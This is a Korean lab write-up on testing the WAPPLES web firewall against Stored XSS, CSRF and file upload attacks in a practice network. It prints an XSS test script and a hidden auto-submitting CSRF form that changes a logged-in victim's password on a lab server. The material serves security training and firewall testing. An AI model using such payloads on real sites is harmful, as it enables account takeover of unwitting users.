WAPPLES 실습 (Stored XSS / CSRF / File Upload 공격 차단)

WAPPLES 실습 (Stored XSS / CSRF / File Upload 공격 차단)

- 공격자 : Win XP(200.200.200.xx), 공격대상 : CentOS WEB(10.10.10.10 / 공인 IP : 200.200.200.xx+1)
- Injection Vector 확인 후 Stored XSS / CSRF / File Upload 공격
- Stored XSS / CSRF / File Upload 공격 차단 정책 적용 후 탐지 결과 및 로그 확인

 

---

Stored XSS = Persistent XSS

서버에 저장한 악성 스크립트를 클라이언트가 요청/응답으로 전달받아 공격하는 형태

 

*  XSS Injection Vector TEST
- TEST용 스크립트를 입력 값으로 전달
- TEST 스크립트가 클라이언트로 재 전달되어 실행되는지 확인

 

 

<script>alert("Stored XSS Test")</script>

 

스크립트 코드가 차단된 것을 확인할 수 있다.

 

차단된 내역

 

---

CSRF (Cross Site Request Forgery, XSRF)

- 사이트 간 요청 위조 공격 → Session Riding 공격
- 웹 사이트에서 제공하는 기능을 신뢰된 사용자의 권한으로 요청하도록 하는 공격
- Session Hijacking과 비슷함 → 클라이언트의 권한을 도용 함

 

 

<iframe name="i" width=0 height=0></iframe><form name="mform" target="i" method="post" action="http://200.200.200.146/member/member_info_change.php"><input type="hidden" name="user_pw1" value="666666"><input type="hidden" name="user_pw2" value="666666"><input type="hidden" name="age" value=0><input type="hidden" name="nick" value=><input type="hidden" name="email" value=></form><script>document.mform.submit()</script>